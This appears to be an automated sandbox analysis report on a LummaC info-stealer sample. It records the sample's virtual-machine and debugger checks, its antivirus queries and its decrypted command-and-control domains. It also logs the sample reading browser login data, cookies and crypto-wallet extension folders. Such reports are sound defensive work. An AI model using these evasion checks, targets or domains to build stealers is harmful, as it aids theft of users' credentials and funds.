            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\7Y18r(97).exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exe TID: 7968Thread sleep time: -210000s >= -30000sJump to behavior
            Source: 7Y18r(97).exe, 00000000.00000003.1612434468.0000000003410000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
            Source: Amcache.hve.5.drBinary or memory string: VMware
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 7Y18r(97).exe, 00000000.00000002.1752535595.0000000000825000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1659282528.0000000000868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: Amcache.hve.5.drBinary or memory string: vmci.sys
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 7Y18r(97).exe, 00000000.00000003.1659282528.0000000000868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+'
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
            Source: 7Y18r(97).exe, 00000000.00000003.1612690362.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: C:\Users\user\Desktop\7Y18r(97).exeAPI call chain: ExitProcess graph end nodegraph_0-25227
            Source: C:\Users\user\Desktop\7Y18r(97).exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AE9D10 LdrInitializeThunk,0_2_02AE9D10
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025706AD mov edx, dword ptr fs:[00000030h]0_2_025706AD
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02570C6D mov eax, dword ptr fs:[00000030h]0_2_02570C6D
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025712BD mov eax, dword ptr fs:[00000030h]0_2_025712BD
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025712BC mov eax, dword ptr fs:[00000030h]0_2_025712BC
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_0257101D mov eax, dword ptr fs:[00000030h]0_2_0257101D

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: 7Y18r(97).exeString found in binary or memory: contemplateodszsv.shop
            Source: 7Y18r(97).exeString found in binary or memory: arriveoxpzxo.shop
            Source: 7Y18r(97).exeString found in binary or memory: catchddkxozvp.shop
            Source: 7Y18r(97).exeString found in binary or memory: declaredczxi.shop
            Source: 7Y18r(97).exeString found in binary or memory: conformfucdioz.shop
            Source: 7Y18r(97).exeString found in binary or memory: bindceasdiwozx.shop
            Source: 7Y18r(97).exeString found in binary or memory: replacedoxcjzp.shop
            Source: 7Y18r(97).exeString found in binary or memory: applyzxcksdia.shop
            Source: 7Y18r(97).exeString found in binary or memory: closedjuruwk.shop
            Source: C:\Users\user\Desktop\7Y18r(97).exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: 7Y18r(97).exe, 00000000.00000002.1752535595.0000000000825000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\7Y18r(97).exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 7Y18r(97).exe PID: 7724, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: 7Y18r(97).exe, 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: trum\\wallets","m":["*"],"z":"Wallets/Electrum",
            Source: 7Y18r(97).exe, 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 520},{"t":0,"p":"%appdata%\\ElectronCash\\wallet
            Source: 7Y18r(97).exe, 00000000.00000003.1637294838.00000000008B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: 7Y18r(97).exe, 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: mple-storage.json","window-state.json"],"z":"Wal&
            Source: 7Y18r(97).exe, 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: 7Y18r(97).exe, 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\\Ethereum","m":["keystore"],"z":"Walle
            Source: 7Y18r(97).exe, 00000000.00000003.1637294838.00000000008B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: 7Y18r(97).exe, 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\\Ethereum","m":["keystore"],"z":"Walle
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
